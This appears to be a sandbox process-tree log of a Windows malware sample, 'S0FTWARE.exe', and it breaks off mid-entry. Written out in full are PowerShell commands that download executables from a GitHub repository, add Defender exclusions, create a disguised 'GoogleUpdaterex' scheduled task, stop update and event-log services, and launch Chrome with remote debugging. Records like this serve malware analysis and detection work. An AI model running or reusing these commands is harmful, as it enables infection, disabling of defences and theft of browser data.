        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff86d14dcf8,0x7ff86d14dd04,0x7ff86d14dd10
        5⤵
        
        PID:1524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\gkjmelg\xgeyridavkk.exe'"
    3⤵
    PID:3468
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\gkjmelg\xgeyridavkk.exe'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5516
- - C:\Users\Admin\AppData\Local\gkjmelg\yadltyouruy.exe
    "C:\Users\Admin\AppData\Local\gkjmelg\yadltyouruy.exe"
    3⤵
    PID:5948
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      4⤵
      PID:1512
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6052
- - C:\Users\Admin\AppData\Local\gkjmelg\xgeyridavkk.exe
    "C:\Users\Admin\AppData\Local\gkjmelg\xgeyridavkk.exe"
    3⤵
    PID:4572
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1192
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:5156
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:3256
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:3144
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:1668
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:5832
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:5328
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:3532
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:6052
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:640
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:6016
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:864
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:3688
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
      4⤵
      Launches sc.exe
      PID:5316

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:3388

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:5288

C:\ProgramData\GoogleUP\Chrome\Updater.exe
C:\ProgramData\GoogleUP\Chrome\Updater.exe
1⤵
PID:3008
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:6056
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4164
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:6052
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1316
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4456
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1972
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:3692
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:3104
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:2624
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:4836
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:5068
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:3456
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:4592

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap7205:88:7zEvent22129
1⤵
PID:4212

C:\Users\Admin\AppData\Roaming\service.exe
C:\Users\Admin\AppData\Roaming\service.exe
1⤵
PID:2100
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
  2⤵
  PID:2264
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4880

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:6124

C:\Users\Admin\Desktop\S0FTWARE.exe
"C:\Users\Admin\Desktop\S0FTWARE.exe"
1⤵
PID:4404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\ynaqrpirpdi\buzqgxyhpt.exe'"
  2⤵
  PID:5208
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\ynaqrpirpdi\buzqgxyhpt.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\ynaqrpirpdi\arfbdsv.exe'"
  2⤵
  PID:864
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\ynaqrpirpdi\arfbdsv.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3028
- C:\Users\Admin\AppData\Local\ynaqrpirpdi\buzqgxyhpt.exe
  "C:\Users\Admin\AppData\Local\ynaqrpirpdi\buzqgxyhpt.exe"
  2⤵
  PID:5280
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    3⤵
    PID:756
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2052
- C:\Users\Admin\AppData\Local\ynaqrpirpdi\arfbdsv.exe
  "C:\Users\Admin\AppData\Local\ynaqrpirpdi\arfbdsv.exe"
  2⤵
  PID:4236

C:\ProgramData\GoogleUP\Chrome\Updater.exe
C:\ProgramData\GoogleUP\Chrome\Updater.exe
1⤵
PID:3352
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:3736
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4208
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:3012
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4628
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1996
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:5828
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2148
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1840
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:5228
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:5892
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:5940

C:\Users\Admin\Desktop\S0FTWARE.exe
"C:\Users\Admin\Desktop\S0FTWARE.exe"
1⤵
PID:3528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\auroiq', 'C:\Users', 'C:\ProgramData'"
  2⤵
  PID:3004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\auroiq', 'C:\Users', 'C:\ProgramData'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\auroiq\ozksszmwrb.exe'"
  2⤵
  PID:2688
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\auroiq\ozksszmwrb.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\auroiq\jnsgwqqfvitr.exe'"
  2⤵
  PID:1916
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\auroiq\jnsgwqqfvitr.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1996
- C:\Users\Admin\AppData\Local\auroiq\ozksszmwrb.exe
  "C:\Users\Admin\AppData\Local\auroiq\ozksszmwrb.exe"
  2⤵
  PID:5968
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    PID:2304
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff85ad5dcf8,0x7ff85ad5dd04,0x7ff85ad5dd10
      4⤵
      PID:1452
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1952,i,649684832178329233,17508646855424916343,262144 --variations-seed-version --mojo-platform-channel-handle=2092 /prefetch:3
      4⤵
      PID:5888
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2064,i,649684832178329233,17508646855424916343,262144 --variations-seed-version --mojo-platform-channel-handle=2060 /prefetch:2
      4⤵
      PID:5964
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2360,i,649684832178329233,17508646855424916343,262144 --variations-seed-version --mojo-platform-channel-handle=2376 /prefetch:8
      4⤵
      PID:5288
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,649684832178329233,17508646855424916343,262144 --variations-seed-version --mojo-platform-channel-handle=3172 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5776
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3132,i,649684832178329233,17508646855424916343,262144 --variations-seed-version --mojo-platform-channel-handle=3144 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5040
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4428,i,649684832178329233,17508646855424916343,262144 --variations-seed-version --mojo-platform-channel-handle=3776 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:6116
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4688,i,649684832178329233,17508646855424916343,262144 --variations-seed-version --mojo-platform-channel-handle=5016 /prefetch:8
      4⤵
      PID:2336
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5336,i,649684832178329233,17508646855424916343,262144 --variations-seed-version --mojo-platform-channel-handle=5100 /prefetch:8
      4⤵
      PID:1008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\auroiq\rilrzm.exe'"
  2⤵
  PID:432
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\auroiq\rilrzm.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5576
- C:\Users\Admin\AppData\Local\auroiq\jnsgwqqfvitr.exe
  "C:\Users\Admin\AppData\Local\auroiq\jnsgwqqfvitr.exe"
  2⤵
  PID:2316
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    3⤵
    PID:1092
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3248
- C:\Users\Admin\AppData\Local\auroiq\rilrzm.exe
  "C:\Users\Admin\AppData\Local\auroiq\rilrzm.exe"
  2⤵
  PID:3972
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:380
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:5364
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2600
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3836
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:5380
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:5532
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:2560
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:3740
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:5316
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:2960
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:388
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:5680
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
    3⤵
    - Launches sc.exe
    PID:5984

C:\Users\Admin\Desktop\S0FTWARE.exe
"C:\Users\Admin\Desktop\S0FTWARE.exe"
1⤵
PID:1284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\pcfghvredizu', 'C:\Users', 'C:\ProgramData'"
  2⤵
  PID:3484
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\pcfghvredizu', 'C:\Users', 'C:\ProgramData'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\pcfghvredizu\vdiqkdxkbcyl.exe'"
  2⤵
  PID:4712
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\pcfghvredizu\vdiqkdxkbcyl.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\pcfghvredizu\svrwkzmghj.exe'"
  2⤵
  PID:1996
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\pcfghvredizu\svrwkzmghj.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1916
- C:\Users\Admin\AppData\Local\pcfghvredizu\vdiqkdxkbcyl.exe
  "C:\Users\Admin\AppData\Local\pcfghvredizu\vdiqkdxkbcyl.exe"
  2⤵
  PID:440
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    PID:6064
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff85ad5dcf8,0x7ff85ad5dd04,0x7ff85ad5dd10
      4⤵
      PID:5720
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2072,i,9828277087211779880,11728275887613577407,262144 --variations-seed-version --mojo-platform-channel-handle=2068 /prefetch:2
      4⤵
      PID:3120
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1960,i,9828277087211779880,11728275887613577407,262144 --variations-seed-version --mojo-platform-channel-handle=2100 /prefetch:3
      4⤵
      PID:5160
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2376,i,9828277087211779880,11728275887613577407,262144 --variations-seed-version --mojo-platform-channel-handle=2476 /prefetch:8
      4⤵
      PID:628
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,9828277087211779880,11728275887613577407,262144 --variations-seed-version --mojo-platform-channel-handle=3264 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1244
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,9828277087211779880,11728275887613577407,262144 --variations-seed-version --mojo-platform-channel-handle=3292 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3776
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4448,i,9828277087211779880,11728275887613577407,262144 --variations-seed-version --mojo-platform-channel-handle=4504 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:824
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5212,i,9828277087211779880,11728275887613577407,262144 --variations-seed-version --mojo-platform-channel-handle=5224 /prefetch:8
      4⤵
      PID:5740
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5332,i,9828277087211779880,11728275887613577407,262144 --variations-seed-version --mojo-platform-channel-handle=5340 /prefetch:8
      4⤵
      PID:5164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\pcfghvredizu\cjjuztwbgkj.exe'"
  2⤵
  PID:3772
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\pcfghvredizu\cjjuztwbgkj.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4920
- C:\Users\Admin\AppData\Local\pcfghvredizu\svrwkzmghj.exe
